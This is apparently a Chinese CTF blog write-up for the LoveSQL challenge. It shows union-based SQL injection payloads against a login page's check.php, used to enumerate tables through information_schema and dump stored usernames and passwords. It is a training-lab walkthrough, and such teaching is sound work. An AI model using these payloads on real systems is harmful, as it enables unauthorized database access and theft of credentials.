[极客大挑战 2019]LoveSQL

[极客大挑战 2019]LoveSQL

在这里插入图片描述

注入过程及思路

首先进行万能密码测试

/check.php?username=1' or 1=1 #&password=1

在这里插入图片描述
发现存在注入
接着查显位点

/check.php?username=admin' order by 4 #&password=1

在这里插入图片描述
当字段数为4时,页面回显错误,使用union查询回显点位:

/check.php?username=aa' union select 0,1,2#&password=1

得到显位点

在这里插入图片描述爆破库

/check.php?username=aa' union select 0,1,database()#&password=1

得到库名"geek"
在这里插入图片描述
爆破表

/check.php?username=aa' union select 0,1,group_concat(table_name) from information_schema.tables where table_schema=database() --+

表:geekuser,l0ve1ysq1
在这里插入图片描述

爆字段:

/check.php?username=aa' union select 0,1,group_concat(column_name) from information_schema.columns where table_name='geekuser' --+

字段:id,username,password
在这里插入图片描述

爆用户:

/check.php?username=aa' union select 0,1,group_concat(username) from geekuser #

geekuser 表中并无flag flag在l0ve1ysq1表中
在这里插入图片描述在这里插入图片描述

爆密码:

/check.php?username=aa' union select 0,1,group_concat(password) from l0ve1ysq1 #

也可以:

/check.php?username=aa' union select 0,1,group_concat(username,0x3a,password) from l0ve1ysq1 #
#0x3a: 0x是十六进制标志,3a是十进制的58,是ascii中的 ':' ,用以分割pasword和username。

在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值